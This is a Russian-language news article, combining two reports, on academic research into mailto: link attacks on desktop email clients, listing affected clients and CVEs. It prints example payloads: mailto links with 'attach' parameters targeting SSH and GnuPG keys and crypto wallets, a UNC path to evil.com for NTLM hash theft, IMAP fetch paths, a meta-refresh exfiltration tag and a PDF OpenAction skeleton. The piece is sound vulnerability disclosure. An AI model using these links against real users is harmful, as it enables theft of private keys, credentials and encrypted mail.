Некоторые почтовые клиенты были уязвимы перед атаками через ссылки mailto

[ve1]

Группа специалистов из Рурского университета в Бохуме и Мюнстерского университета прикладных наук опубликовала доклад, рассказывающий об уязвимостях ряда почтовых клиентов. Оказалось, некоторые десктопные клиенты весьма странно работают со ссылками типа mailto, что в итоге может привести к хищению локальных файлов, которые могут быть оправлены злоумышленнику в качестве вложений.

Корень проблемы заключается в том, как в уязвимых клиентах реализован стандарт RFC6068, описывающий URI-схему mailto. Напомню, что такие ссылки обычно поддерживаются почтовыми клиентами и браузерами, и нажатие на них приводит к открытию нового окна для составления электронного письма (или ответа), а не новую страницу или сайт.

Согласно RFC6068, ссылки mailto могут поддерживать различные параметры, которые могут использоваться для предварительного заполнения нового email-окна предопределенным содержимым. К примеру, ссылка вида <a href="mailto:bob@host.com?Subject=Hello&body=Friend">Click me!</a> откроет новое окно для создания письма, в котором адрес электронной почты получателя будет bob@host.com, темой будет значиться «Hello», а текст будет начинаться с «Friend».

Хотя RFC6068 имеет множество настраиваемых параметров, разработчикам обычно рекомендуется придерживаться лишь нескольких безопасных вариантов. Так, согласно свежему докладу, некоторые почтовые клиенты поддерживают весьма экзотические параметры, из-за чего их пользователи оказываются под угрозой.

В частности, речь идет о параметрах attach или attachment, которые позволяют ссылкам mailto открывать новые окна с уже вложенным файлом. В итоге злоумышленники могут отправлять жертвам письма, содержащие замаскированные ссылки mailto, или размещать вредоносные ссылки mailto на сайтах. При нажатии на такие ссылки конфиденциальные файлы могут автоматически добавляться во вложения к письмам.


Если пользователь не заметит прикрепленный файл, атакующий может заполучить конфиденциальные данные, включая ключи SSH и PGP, файлы конфигурации, файлы криптовалютных кошельков, пароли или важные бизнес-документы (при условии, что пути для этих файлов известных хакеру).

Исследователи протестировали несколько сценариев такой атаки:

• использование точных путей к нужным файлам;
• использование знаков «*» для кражи сразу нескольких файлов;
• использование URL-адресов для внутренних сетевых ресурсов (\\company_domain\file );
• использование URL-адресов, приводящих жертву на SMB-сервер злоумышленника, из-за чего у жертвы утекает хэш NTLM (\\evil.com\dummyfile);
• использование IMAP-ссылок для кражи всей электронной почты из IMAP-ящика пользователя (imap:///fetch>UID>/INBOX).

В результате проверки 20 почтовых клиентов обнаружилось, что 4 из них уязвимы перед атаками через ссылки mailto (в настоящее время все уязвимости уже исправлены):

• Evolution, дефолтный почтовый клиент GNOME (CVE-2020-11879);
• KMail, дефолтный почтовый клиент KDE (CVE-2020-11880);
• IBM/HCL Notes для Windows (CVE-2020-4089);
• старые версии Thunderbird для Linux.

Источник: xakep.ru/2020/08/19/mailto-problems/

 

[INC.]

Исследователи из Рурского университета в Бохуме (Германия) проанализировали поведение почтовых клиентов при обработке ссылок "mailto:" с расширенными параметрами. Пять из двадцати рассмотренных почтовых клиентов оказались уязвимы для атаки, манипулирующей подстановкой ресурсов при помощи параметра "attach". Ещё шесть почтовых клиентов были подвержены атаке по замене ключей PGP и S/MIME, а три клиента оказались уязвимы для атаки по извлечению содержимого зашифрованных сообщений.

Ссылки "mailto:" применяются для автоматизации открытия почтового клиента с целью написания письма заданному в ссылке адресату. Кроме адреса в составе ссылки можно указать дополнительные параметры, такие как тема письма и шаблон типового содержимого. Предложенная атака манипулирует параметром "attach", позволяющем прикрепить к создаваемому письму вложение.

Почтовые клиенты Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) и Pegasus Mail оказались уязвимы тривиальной атаке, позволяющей автоматически прикрепить любой локальный файл, указанный через ссылку вида "mailto:?attach=путь_к_файлу". Файл прикрепляется без вывода предупреждения, поэтому без специального акцентирования внимания пользователь может не заметить, что письмо будет отправлено с прикреплением вложением.

Например, при помощи ссылки вида "mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" можно подставить в письмо закрытые ключи от GnuPG. Также можно отправить содержимое криптокошельков (~/.bitcoin/wallet.dat), SSH-ключи (~/.ssh/id_rsa) и любые доступные пользователю файлы. Более того, Thunderbird позволяет прикреплять группы файлов по маске при помощи конструкций вида "attach=/tmp/*.txt".

Кроме локальных файлов некоторые почтовые клиенты обрабатывают ссылки на сетевые хранилища и пути в IMAP-сервере. В частности, IBM Notes позволяет передать файл из сетевого каталога при обработке ссылок вида "attach=\\evil.com\dummyfile", а также перехватить параметры аутентификации NTLM направив ссылку на SMB-сервер, подконтрольный атакующему (запрос будет отправлен с текущими параметрами аутентификации пользователя).

Thunderbird успешно обрабатывает запросы вида "attach=imap:///fetch>UID>/INBOX>1/", позволяющие прикрепить содержимое из папок на IMAP-сервере. При этом извлекаемые из IMAP письма, зашифрованные через OpenPGP и S/MIME, автоматически расшифровываются почтовым клиентом перед отправкой. Разработчики Thunderbird были уведомлены о проблеме в феврале и в выпуске Thunderbird 78 проблема уже устранена (ветки Thunderbird 52, 60 и 68 остаются уязвимыми).

Старые версии Thunderbird оказались уязвимы и для двух других вариантов атаки на PGP и S/MIME, предложенных исследователями. В частности, к Thunderbird, а также к OutLook, PostBox, eM Client, MailMate и R2Mail2 оказалась применима атака по замене ключей, вызванная тем, что почтовый клиент автоматически импортирует и устанавливает новые сертификаты, передаваемые в сообщениях S/MIME, что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.

Вторая атака, которой подвержены Thunderbird, PostBox и MailMate, манипулирует особенностями механизма автосохранения черновиков сообщений и позволяет при помощи параметров mailto инициировать расшифровку зашифрованных сообщений или добавление цифровой подписи для произвольных сообщений, с последующей передачей результата на IMAP-сервер атакующего. Шифротекст при данной атаке передаётся через парметр "body", а для инициирования обращения к IMAP-серверу атакующего применяется тег "meta refresh". Например: '<meta http-equiv="refresh" content="60; URL=mailto:?body=-----BEGIN PGP MESSAGE-----[...]-----END PGP MESSAGE-----">'

Для автоматической обработки ссылок "mailto:" без участия пользователя могут применяться специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:

   %PDF-1.5
   1 0 obj
   << /Type /Catalog /OpenAction [2 0 R] >> 
   endobj
   
   2 0 obj
   << /Type /Action /S /URI/URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...])>>
   endobj

• Source: https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2020/08/15/mailto-paper.pdf